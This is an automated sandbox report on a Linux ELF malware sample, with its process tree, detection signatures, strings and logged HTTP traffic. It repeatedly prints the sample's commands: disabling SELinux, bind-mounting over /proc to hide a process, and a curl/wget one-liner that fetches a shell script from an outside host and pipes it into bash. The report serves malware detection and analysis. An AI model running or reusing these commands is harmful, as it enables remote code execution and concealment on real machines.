Linux Analysis Report
mcron-vip-1.elf

Overview

General Information

Sample name:mcron-vip-1.elf
Analysis ID:1547393
MD5:4e9526bcce8ad234b516a6cf30a4acc9
SHA1:da42a05843d9662a2ee992d52d2c00fd048ae723
SHA256:de490d56cb9a511e4510160281fce2e3a6d9a3596ad7873b9dd7cfd61e52ae3d
Tags:elf, user-abuse_ch
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Executes itself again with its parent PID as an argument (indicative of hampering debugging)
Contains symbols related to standard C library sleeps (sometimes used to evade sandboxing)
Creates hidden files and/or directories
Executes commands using a shell command-line interpreter
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "wget" command typically used for HTTP/S downloading
Found strings indicative of a multi-platform dropper
Reads the 'hosts' file potentially containing internal network hosts
Sample and/or dropped files contains symbols with suspicious names
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1547393
Start date and time:2024-11-02 10:05:12 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 18s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:mcron-vip-1.elf
Detection:MAL
Classification:mal52.evad.linELF@0/1@22/0
Cookbook Comments:
  • Analysis time extended to 480s due to sleep detection in submitted sample
  • VT rate limit hit for: mcron-vip-1.elf
Command:/tmp/mcron-vip-1.elf
PID:5487
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • mcron-vip-1.elf (PID: 5487, Parent: 5412, MD5: 4e9526bcce8ad234b516a6cf30a4acc9) Arguments: /tmp/mcron-vip-1.elf
    • mcron-vip-1.elf New Fork (PID: 5488, Parent: 5487)
      • mcron-vip-1.elf New Fork (PID: 5489, Parent: 5488)
        • sh (PID: 5490, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "setenforce 0 &>/dev/null"
          • sh New Fork (PID: 5491, Parent: 5490)
        • sh (PID: 5492, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mount --bind /tmp/.c /proc/5489"
          • sh New Fork (PID: 5493, Parent: 5492)
          • mount (PID: 5493, Parent: 5492, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount --bind /tmp/.c /proc/5489
        • sh (PID: 5504, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5516, Parent: 5504)
            • sh New Fork (PID: 5518, Parent: 5516)
            • curl (PID: 5518, Parent: 5516, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5516, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5517, Parent: 5504)
          • bash (PID: 5517, Parent: 5504, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
        • sh (PID: 5582, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5583, Parent: 5582)
            • sh New Fork (PID: 5585, Parent: 5583)
            • curl (PID: 5585, Parent: 5583, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5583, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5584, Parent: 5582)
          • bash (PID: 5584, Parent: 2955, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
        • sh (PID: 5616, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5617, Parent: 5616)
            • sh New Fork (PID: 5619, Parent: 5617)
            • curl (PID: 5619, Parent: 5617, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5617, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5618, Parent: 5616)
          • bash (PID: 5618, Parent: 2955, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
        • sh (PID: 5656, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5657, Parent: 5656)
            • sh New Fork (PID: 5659, Parent: 5657)
            • curl (PID: 5659, Parent: 5657, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5657, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5658, Parent: 5656)
          • bash (PID: 5658, Parent: 2955, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
        • sh (PID: 5691, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5692, Parent: 5691)
            • sh New Fork (PID: 5694, Parent: 5692)
            • curl (PID: 5694, Parent: 5692, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5692, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5693, Parent: 5691)
          • bash (PID: 5693, Parent: 5691, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
        • sh (PID: 5725, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5726, Parent: 5725)
            • sh New Fork (PID: 5728, Parent: 5726)
            • curl (PID: 5728, Parent: 5726, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5726, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5727, Parent: 5725)
          • bash (PID: 5727, Parent: 5725, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
        • sh (PID: 5758, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5759, Parent: 5758)
            • sh New Fork (PID: 5761, Parent: 5759)
            • curl (PID: 5761, Parent: 5759, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5759, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5760, Parent: 5758)
          • bash (PID: 5760, Parent: 5758, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
        • sh (PID: 5791, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5792, Parent: 5791)
            • sh New Fork (PID: 5794, Parent: 5792)
            • curl (PID: 5794, Parent: 5792, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5792, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5793, Parent: 5791)
          • bash (PID: 5793, Parent: 5791, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
        • sh (PID: 5824, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5825, Parent: 5824)
            • sh New Fork (PID: 5827, Parent: 5825)
            • curl (PID: 5827, Parent: 5825, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5825, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5826, Parent: 5824)
          • bash (PID: 5826, Parent: 2955, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
  • udisksd New Fork (PID: 5503, Parent: 803)
  • dumpe2fs (PID: 5503, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
No yara matches
No Suricata rule has matched

AV Detection

Source: mcron-vip-1.elf, ReversingLabs: Detection: 34%
Source: mcron-vip-1.elf, String: (curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null
Source: mcron-vip-1.elf, String: (curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null/var/tmp/.cron/tmp/.cReceived signal , exiting.umount /proc/%dFailed to open PID file: Another instance is already running.Failed to lock PID file: %ldFailed to create temporary directory: mount --bind %s /proc/%dFailed to bind mount /proc/Fork failed.Setsid failed.Second fork failed./Chdir failed./dev/nullsetenforce 0 &>/dev/null
Source: /bin/sh (PID: 5516), Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5583), Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5617), Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5657), Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5692), Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5726), Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5759), Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5792), Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: /bin/sh (PID: 5825), Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
Source: /usr/bin/curl (PID: 5518), Reads hosts file: /etc/hosts
Source: /usr/bin/wget (PID: 5516), Reads hosts file: /etc/hosts
Source: /usr/bin/curl (PID: 5585), Reads hosts file: /etc/hosts
Source: /usr/bin/wget (PID: 5583), Reads hosts file: /etc/hosts
Source: /usr/bin/curl (PID: 5619), Reads hosts file: /etc/hosts
Source: /usr/bin/wget (PID: 5617), Reads hosts file: /etc/hosts
Source: /usr/bin/curl (PID: 5659), Reads hosts file: /etc/hosts
Source: /usr/bin/wget (PID: 5657), Reads hosts file: /etc/hosts
Source: /usr/bin/curl (PID: 5694), Reads hosts file: /etc/hosts
Source: /usr/bin/wget (PID: 5692), Reads hosts file: /etc/hosts
Source: /usr/bin/curl (PID: 5728), Reads hosts file: /etc/hosts
Source: /usr/bin/wget (PID: 5726), Reads hosts file: /etc/hosts
Source: /usr/bin/curl (PID: 5761), Reads hosts file: /etc/hosts
Source: /usr/bin/wget (PID: 5759), Reads hosts file: /etc/hosts
Source: /usr/bin/curl (PID: 5794), Reads hosts file: /etc/hosts
Source: /usr/bin/wget (PID: 5792), Reads hosts file: /etc/hosts
Source: /usr/bin/curl (PID: 5827), Reads hosts file: /etc/hosts
Source: /usr/bin/wget (PID: 5825), Reads hosts file: /etc/hosts
Source: unknown, TCP traffic detected without corresponding DNS query: 185.125.190.26
Source: unknown, TCP traffic detected without corresponding DNS query: 185.125.190.26
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; Host: dl.0889.org; User-Agent: curl/7.68.0; Accept: */*
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; User-Agent: Wget/1.20.3 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: dl.0889.org; Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; Host: dl.0889.org; User-Agent: curl/7.68.0; Accept: */*
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; User-Agent: Wget/1.20.3 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: dl.0889.org; Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; Host: dl.0889.org; User-Agent: curl/7.68.0; Accept: */*
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; User-Agent: Wget/1.20.3 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: dl.0889.org; Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; Host: dl.0889.org; User-Agent: curl/7.68.0; Accept: */*
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; User-Agent: Wget/1.20.3 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: dl.0889.org; Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; Host: dl.0889.org; User-Agent: curl/7.68.0; Accept: */*
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; User-Agent: Wget/1.20.3 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: dl.0889.org; Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; Host: dl.0889.org; User-Agent: curl/7.68.0; Accept: */*
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; User-Agent: Wget/1.20.3 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: dl.0889.org; Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; Host: dl.0889.org; User-Agent: curl/7.68.0; Accept: */*
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; User-Agent: Wget/1.20.3 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: dl.0889.org; Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; Host: dl.0889.org; User-Agent: curl/7.68.0; Accept: */*
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; User-Agent: Wget/1.20.3 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: dl.0889.org; Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; Host: dl.0889.org; User-Agent: curl/7.68.0; Accept: */*
Source: global traffic, HTTP traffic detected: GET /vip-1.sh HTTP/1.1; User-Agent: Wget/1.20.3 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: dl.0889.org; Connection: Keep-Alive
Source: global traffic, DNS traffic detected: DNS query: dl.0889.org
Source: global traffic, DNS traffic detected: DNS query: daisy.ubuntu.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:05:53 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:05:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:06:53 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:06:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:07:53 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:07:53 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:07:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:07:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:08:53 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:08:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:09:53 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:09:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
